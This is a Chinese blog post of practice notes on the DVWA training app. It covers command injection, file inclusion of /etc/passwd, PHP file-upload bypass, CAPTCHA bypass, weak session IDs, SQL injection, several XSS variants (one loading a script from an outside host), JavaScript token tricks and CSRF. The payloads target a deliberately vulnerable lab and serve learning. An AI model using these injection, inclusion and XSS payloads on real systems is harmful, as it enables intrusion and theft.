DVWA练习

本文详细介绍了DVWA(Damn Vulnerable Web Application)的各种安全练习,包括命令行注入、文件包含、文件上传漏洞、不安全的验证码、弱Session ID、SQL注入、反射型和存储型XSS攻击、DOM型XSS攻击、JavaScript攻击以及CSRF攻击,揭示了各种常见的Web应用安全漏洞及其防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

命令行注入(对命令行内容没有校验)
   注释&;|-$()`|| &&空格

windows系列支持的管道符如下所示
|:直接执行后面的语句,如ping 127.0.0.1 | whoami
||:如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假,如ping 2 || whoami
&:如果前面的语句为假则直接执行后面的语句,如ping 127.0.0.1 & whoami
&&:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真,如ping 127.0.0.1 && whoami

Linux系列支持的管道符如下所示
    ;:执行完前面的语句再执行后面的如ping 127.0.0.1; whoami
|:显示后面语句的执行结果,如ping 127.0.0.1 | whoami
||:如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假,如ping 2 || whoami
&:如果前面的语句为假则直接执行后面的语句,如ping 127.0.0.1 & whoami
&&:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句只能为真,如ping 127.0.0.1 && whoami

文件包含(include文件包含)
   http://10.89.184.75:50001/vulnerabilities/fi/?page=file1.php
    修改文件路径,可以直接访问系统文件
    http://10.89.184.75:50001/vulnerabilities/fi/?page=/etc/passwd
    http://192.168.0.110:5678/vulnerabilities/fi/?page=http://www.baidu.com
    http://192.168.0.110:5678/vulnerabilities/fi/?page=file:///etc/apache2/apache2.conf 
文件上传漏洞(对文件类型、文件后缀没有校验)
        图片上传漏洞-低级(没有判断Content-Type和文件后缀名)
    ../../hackable/uploads/phpinfo.php succesfully uploaded!
    http://10.89.184.75:50001/hackable/uploads/phpinfo.php
    图片上传漏洞-中级(只判断了Content-Type,没有判断文件后缀名,直接使用burnsuit修改Content-Type规避)
    Content-Type: image/png     ----application/text
    图片上传漏洞-高级?
        既是图片也是代码?
不安全的验证码
        低级漏洞,校验和修改密码分2步骤,可以通过修改请求消息(burn或表单)绕过去
        step=2&password_new=123456&password_conf=123456&recaptcha_challenge_field=SHUTDOWN&recaptcha_response_field=&Change=Change
Weak Session IDs
      低级漏洞:+1
      中级漏洞:时间戳
      高级漏洞:MD5加密
      不可能的:SHA1
SQL注入
      sql语句条件判断
      修改form表单id
SQL注入(Blind)
反射型XSS功能(Reflected Cross Site Scripting)
      XSS (Cross-site scripting) 攻击,原本开发者想的是显示数据,攻击者输入确实破坏性的代码。主要应用于“HTML注入”
    低级漏洞
      <script>alert(1)</script>
      <script src="//www.a.com/test.js"></script>
    中级漏洞(大小写或利用字符替换的漏洞)
      <Script src="//www.a.com/test.js"></Script>
      <scr<script>ipt src="//www.a.com/test.js"></script>
    高级漏洞(图片注入)
    <img src="http://127.0.0.1/test/1.png">
存储型XSS攻击
    低级漏洞(对message注入)
    <script>alert(1)</script>
    中级漏洞(对name注入,需要修改maxlength)
    <Script>alert(1)</Script>
   高级漏洞(图片注入)
    <img src="http://127.0.0.1/test/1.png">
DOM型XSS攻击:
    低级漏洞(对表单提交的数据逻辑处理漏洞进行js注入)
    10.89.184.75:50001/vulnerabilities/xss_d/?default=<script>alert(1)</script>
    中级/高级漏洞(利用参数,新增参数插入js语句或利用location.hash)
    10.89.184.75:50001/vulnerabilities/xss_d/?default=English&&script<script>alert(1)</script>
    10.89.184.75:50001/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>
JavaScript攻击
    低级漏洞(token的校验在前台,使用的是MD5)
    在输入框输入success,在控制台在调用 generate_token() 
    中级漏洞(token的校验在js文件中)
    在输入框输入success,在控制台在调用do_elsesomething("XX") 
    高级漏洞
    在输入框输入success
    token_part_1("ABCD", 44)
    token_part_2("XX")
    点击按钮会执行token_part_3()
CSRF攻击(Cross Site Request Forgery):跨站请求伪造攻击
    低级漏洞(对来源地址没有校验)
    通过BurpSuite生成修改密码的Csrf的html代码:右击->Engagement tools->Generate CSRF PoC
    将生成的代码发布到一个网站中,如http://127.0.0.1/test/csrf.html,然后诱导用户访问,当目标用户处于登陆状态,并同一浏览器访问了该网站后,目标用       户就会修改密码
    中级漏洞(通过文件命名规避来源地址检查)
    10.89.184.75.html
    高级漏洞
绕过内容安全策略Content Security Policy(CSP)Bypass

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值